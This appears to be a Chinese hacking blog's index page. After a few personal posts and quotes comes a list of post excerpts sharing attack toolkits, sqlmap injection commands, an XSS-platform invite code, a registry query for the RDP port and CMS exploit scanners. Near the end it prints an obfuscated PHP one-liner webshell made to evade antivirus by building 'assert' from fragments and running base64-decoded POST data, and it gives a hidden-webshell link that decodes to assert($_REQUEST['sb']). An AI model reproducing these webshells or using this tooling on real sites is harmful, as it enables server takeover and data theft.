• 仙人南山游戏现在暂时下线,以后上线时间未知,开发作者貌似转手给其他人了,所以短时间应该没什么希望了,听说会开发成app也能玩的

  • 背灯和月就花阴,已是十年踪迹十年心。

  • “无论我活成什么狗样,我都一直相信我前途无量”——来自散文集《我在人间凑数的日子》

  • 我很想你,但我不会主动找你,九分爱你,一分尊严,这是我最后的倔强---选自散文集《我在人间凑数的日子》

  • 努力为了见到完美的自己,才发现过去才是真的自我,选自散文集《我在人间凑数的日子》

  • 从来如此,便对么?——出自鲁迅先生笔下的《狂人日记》

  • 我们遇到什么困难,也要奥利给! ——选自散文集《我在人间凑数的日子》

  • 今晚18:00 B站 国创动画作品发布会
    凡人修仙传动画连续剧,也就是我们一直在说的动画番剧
    将公布一个4分钟以上的PV 和一些相关消息
    电脑端在B站首页的轮播图能够找到观看入口
    手机端可以在bilibili APP的直播频道找到观看入口
    道友们不要错过哟~~~~

  • :mrgreen: 以前的网站太卡了,这会儿换了主题,把之前的插件都换了,速度还是有点慢

简单的入侵检测

当一名黑客获得一份WebShell后,会做什么?

当一名黑客获得一份WebShell后,会做什么?

当你获得一份webshell后,你会干嘛?我曾获得N多webshell。什么discuz、dedecms、phpwind、phpweb、aspcms等等,甚至还包括N多自己研发的线上平台。可是,问题来了,那么我能干嘛呢?很多人对“hacker”的理解就是:攻破某某大型平台、攻破XX计算机,黑首页、格盘、数据泄露、等等,想想就可怕当一家公司的数据出现……

实战密码重置漏洞 重置群英网络 任意账号(转载SSS安全论坛)

实战密码重置漏洞 重置群英网络 任意账号(转载SSS安全论坛)

https://yunpan.cn/ckt9AaGIRa4rB  访问密码 4588 转载自SSS安全论坛原文地址:http://bbs.sssie.com/thread-1955-1-1.html……

XISE WBMS6免费分享

XISE WBMS6免费分享

我对于这些没多少了解。刚才看到网盘里有就分享出来了。以前也发过一个。有相关介绍:http://blog.xiaohack.org/126.html解压密码:xiaohack.org……

Sqlmap注入技巧

Sqlmap注入技巧

php+mysql注入方法:http://tieba.baidu.com/p/3723202169http://www.cnblogs.com/Javame/p/3753060.html sqlmap命令大全1:access注入猜解表名 and exists (select * from admin)猜解列名 and exists(sel……

SQLmap注入笔记

SQLmap注入笔记

sqlmap.py -u "url" --tables 列出数据库中的表( --tables:列出表)sqlmap.py -u "url" -T 表 --columns 列出表中字段-D:指定数据库名称-T:指定要列出字段的表--columns:指定列出字段sqlmap.py -u "url" -T userb -C "帐号,密码" --d……

SQL注入判断笔记

SQL注入判断笔记

.py -u "url" -v 1 --union-use --banner24)python sqlmap.py -u "url" -v 5 --union-use --current-user25)python sqlmap.py -u "url" -v 1 --union-use --dbs今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实……

Php隐藏一句话

Php隐藏一句话

PHP一句话隐蔽代码附加链接PHP一句话代码菜刀链接地址:(也是链接地址)http://localhost:8080/wamp.php?bast=YXNzZXJ0KCRfUkVRVUVTVFsnc2InXSk=&cmd=assert 密码:sb……

分享一波SSS论坛旗下XSS平台邀请码

分享一波SSS论坛旗下XSS平台邀请码

邀请码:6b0b2bb07869e0237c5494926b5e743f948ad54762a50505494fe2b19aca371240aed53e73807ebd315ef2a61403aec475d9705ad3d4e249d35cf29d820247966946b7a6d74efde7798d4a26035b0350……

Apache OpenMeetings 会议系统getshell初探

Apache OpenMeetings 会议系统getshell初探

Apache OpenMeetings 算是比较冷门的系统,国内比较少见,要么都在内网吧。根据已经发布的漏洞:Apache OpenMeetings ZIP文件路径遍历(穿越)漏洞(CVE-2016-0784)Apache OpenMeeting可预测密码重置令牌漏洞(CVE-2016-0783)存在理论上getshell的可行性;1. 本地搭建o……

常用CMS漏洞exp&poc批量扫描的python脚本

常用CMS漏洞exp&poc批量扫描的python脚本

链接:http://pan.baidu.com/s/1qXZ0ryW 密码:t0vb seebug的pocsuite。。https://github.com/knownsec/Pocsuitehttps://github.com/rootphantomer/exp ……

网络资产信息扫描(F-NAScan)

网络资产信息扫描(F-NAScan)

网络资产信息扫描在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指……

URL采集工具分享(7KBscan)

URL采集工具分享(7KBscan)

你是否经常整夜失眠睡不着?你是否总是腰酸背痛四肢无力?你是否时常无精打采腰肢酸软?--如果是的,没错,那么你肯定是肾虚!我不是老中医治不了!但是,你是否还常常四处寻找一款URL采集神器呢?不用怕,深夜福利,大表哥 @一个小尼玛 荣誉出品的URL采集神器新鲜出炉,不要199,也不要9块9,今夜免费提供下载!7kbscan 7kbdomainui 2.……

吃饱饭跟我一起刷STR2吧【STR 2神器集合】

吃饱饭跟我一起刷STR2吧【STR 2神器集合】

不管效果怎么样,看到的,收集的都发出来了,自己去测试。第一款、大家都丢出来了,我也丢一个效果图PHP代码< ?php /* Strutr 批量扫描工具 By:T0n9 */ error_reporting(0); if(empty($argv[1])){ print_r(" +==========================……

网络资产信息扫描(F-NAScan)

网络资产信息扫描(F-NAScan)

网络资产信息扫描在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指……

又一大波神器集合

又一大波神器集合

链接:http://pan.baidu.com/s/1pLIgCP1 密码:16hq解压密码:blog.xiaohack.org/sqjh解压密码:blog.xiaohack.org/sqjh解压密码:blog.xiaohack.org/sqjh为什么要说三遍呢?……

cmd读3389端口测试成功终结版

cmd读3389端口测试成功终结版

第1种:regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"然后type c:\\tsport.reg | find "PortNumber"然后16进制转10进制查明文;这个……

POC集合扫描框架Pocscan(支持被动式扫描)

POC集合扫描框架Pocscan(支持被动式扫描)

Pocscan是一款开源 Poc 调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC 按照官方规范编写的 Poc对目标域名进行漏洞扫描。提供了chrome浏览器插件,自动抓取页面的dns发到扫描后端.下载地址https://github.com/erevus-cn/pocscan/骚年,现在你就只……

一句话php木马 过狗

一句话php木马 过狗

<?php if(isset($_REQUEST['hello'])){ $i[0] = 'asse'.'rt'; $array[] = $i; $key=str_replace("yBZ","",$_POST[ad]); $i[1]=base64_decode($key); $array[0][0]($i[1]); } ……